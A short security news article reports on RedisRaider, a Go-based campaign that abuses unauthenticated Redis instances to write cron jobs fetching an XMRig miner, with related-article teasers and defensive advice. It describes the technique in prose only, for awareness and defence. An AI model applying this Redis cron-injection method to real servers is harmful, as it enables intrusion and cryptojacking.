RedisRaider is a new hacking campaign developed in Go that infects Linux servers with the XMRig cryptominer, exploiting vulnerabilities in Redis instances.

20 May 2025 2 minutes Author: Newsman

RedisRaider is a new Go-based hacking campaign that infects Linux servers with the XMRig cryptominer by exploiting vulnerabilities in Redis instances.

Researchers from Datadog Security Labs have discovered RedisRaider, a massive IPv4 scanning operation that aims to exploit Redis configuration. The goal is to deploy the XMRig miner and then self-propagate the malware. RedisRaider uses Redis commands (`CONFIG`, SET`) to add `cron` jobs to `/etc/cron.d`, which load the Go attacker from a remote server. The infected hosts then launch the Monero miner (XMRig), which then spreads to other Redis instances. The campaign uses obfuscation techniques: TTL keys, configuration changes, and log minimization.

RedisRaider is not the first example of cryptojacking via unsecured Redis. Redis, a popular NoSQL database, has repeatedly become an attack vector, especially if ports are open without authentication. At the same time, Guardz reports an attack on Microsoft Entra ID via BAV2ROPC, which allows you to bypass MFA – an indicator of systemic abuse of outdated protocols.

RedisRaider demonstrates that even legitimate functions can be used as a weapon. Vulnerable Redis servers become entry points for cryptojacking and further attacks. It is worth immediately closing open Redis, restricting access using a firewall, monitoring cron, and disallowing writing to `/etc/cron.d.

Other related articles
News
Read more
How a fake password manager led to an ESXi encryptor
In 2025, hackers distributed a fake version of KeePass — KeeLoader — through Bing ads, stealing passwords, installing Cobalt Strike, and launching an ESXi encryptor. The campaign is associated with Black Basta and used typosquatting domains.
71
News
Read more
O2 UK leaked subscriber locations over calls — bug existed for over 2 years
O2 UK’s network has been leaking geolocation data, IMSI, IMEI and other subscriber identifiers via SIP headers during VoLTE/WiFi calls for over two years. The vulnerability allowed the subscriber’s exact location to be determined even abroad. The issue was discovered by researcher Daniel Williams and was patched by Virgin Media O2 in May 2025. This highlights the importance of protecting the telecommunications signal layer.
95
News
Read more
UK Legal Aid Office online service, which led to the theft of criminal cases
The UK has been hit by a major cyberattack on the Legal Aid Office, in which hackers stole applicants’ details, including addresses, financial information and even criminal records. The Ministry of Justice has confirmed the scale of the breach and is advising anyone who has used the service since 2010 to take security measures.
67
Found an error?
If you find an error, take a screenshot and send it to the bot.